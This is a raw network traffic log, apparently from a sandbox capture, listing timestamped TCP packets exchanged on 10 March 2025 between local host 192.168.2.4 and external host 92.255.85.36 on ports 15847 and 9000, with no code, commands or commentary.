                                                                                                                                                                                                      Mar 10, 2025 21:40:43.611758947 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.651015997 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.714673042 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.719572067 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.729787111 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.775923014 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.812135935 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.852356911 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.864129066 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.916527033 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.968909979 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:43.990699053 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.033086061 CET497279000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.037993908 CET90004972792.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.038417101 CET497279000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.038858891 CET497279000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.038996935 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.043617010 CET90004972792.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.088783026 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.105602980 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.110796928 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.214148998 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.232517958 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.275991917 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.323817015 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.327441931 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.369678020 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.374536037 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.432914972 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.447076082 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.494817972 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.543135881 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.580014944 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.619685888 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.653321028 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.686991930 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.729052067 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.737543106 CET90004972792.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.737628937 CET90004972792.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.737772942 CET497279000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.740216017 CET497279000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.745676041 CET90004972792.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.761116982 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.806509972 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.854090929 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.855508089 CET497289000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.860337973 CET90004972892.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.860424042 CET497289000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.860519886 CET497289000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.865251064 CET90004972892.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.871471882 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.918997049 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.925410986 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.979049921 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.989398003 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:44.994152069 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.044823885 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.088447094 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.105635881 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.110675097 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.164433002 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.213423014 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.215228081 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.235405922 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.284090996 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.327999115 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.332971096 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.403671026 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.433274031 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.438246012 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.523082018 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.540640116 CET90004972892.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.540781975 CET90004972892.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.540935993 CET497289000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.540998936 CET497289000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.542936087 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.545761108 CET90004972892.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.547858000 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.642676115 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.651726961 CET497299000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.652070045 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.656651974 CET90004972992.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.656776905 CET497299000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.656838894 CET497299000192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.658109903 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.661720991 CET90004972992.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.761652946 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.762156010 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.762336969 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.766562939 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.872941971 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.877824068 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.881629944 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.932276964 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:45.981873989 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:46.015618086 CET158474972692.255.85.36192.168.2.4
                                                                                                                                                                                                      Mar 10, 2025 21:40:46.057360888 CET4972615847192.168.2.492.255.85.36
                                                                                                                                                                                                      Mar 10, 2025 21:40:46.090389013 CET4972615847192.168.2.492.255.85.36